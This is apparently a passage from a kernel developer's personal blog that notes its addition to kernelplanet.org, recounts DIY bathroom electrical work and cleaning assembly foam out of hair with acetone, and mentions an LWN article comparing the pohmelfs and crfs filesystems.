Someone good placed my rss feed to kernelplanet.org,
which is a kernel hackers place of shame glory :)
Well, one who did that probably saw that frequently I write quite a lot
of notes for a day, that I have no political/hacker/whatever ethic in
the blog, that I made too many english errors (especially when I have
no access to the dictionary) and so on, hope it is not that bad.
So, couple of words about what it is. This blog is fully devoted to how
I spend the days: hacking, having a rest, sleep and move to the toilet...
Blog has comments (with a bit not user friendly captcha), and number of them
one can find at the end of the message. When new comment is added, entry is updated,
so stream-based aggregators will see it as a new one. Usually there are 1-3 entries
per day, sometimes more, sometimes no entries.
Also replaced electricity switch with the new one and installed
warm floor thermal system in the bathrom, but the latter is not yet
fully completed (wires are connected without good isolation yet
and thermal controller is not placed into its own socket in the wall,
but hungs around on wires), but it work (do not know how good, and
I will turn electricity off when move from home, will check it
thermal capabilities when I'm able to stop the fire...
I started electricity projects in the bathroom, which required
to setup electicity sockets for light switch and warm floor. During
installation I managed to get dirty of assembly foam, which,
if you do not know, is much much more heavier to clean than
any other material we have. And I managed to make dirty
not hands (that's usual), but hair (I first time worked without hat).
This forced me to wash my head with acetone... It was not that bad actually,
maybe except its smell, so eventually I cleaned almost all dirty areas
(about one quarter I belive, since I have no mirror I can not say for sure)
and washed it couple of times usual way, but that stopped me from further
development for today.
Maybe I will finish it tomorrow.
At LWN.net. And as usual I do not have an account this time...
So, will wait for a week for free article, by that time pohmelfs will contain very tasty things,
which do not exist in any other fs out there (or at least in the single filesystem).
Edited to add, that Simon Holm Thøgersenshared a link to the article. It is somewhat fun,
although author (Jake Edge) writes quite differently from Jonathan Corbet imho. Article
does not compare pohmelfs and crfs, but shows that they are very similar. I've known, that
Zach Brown wo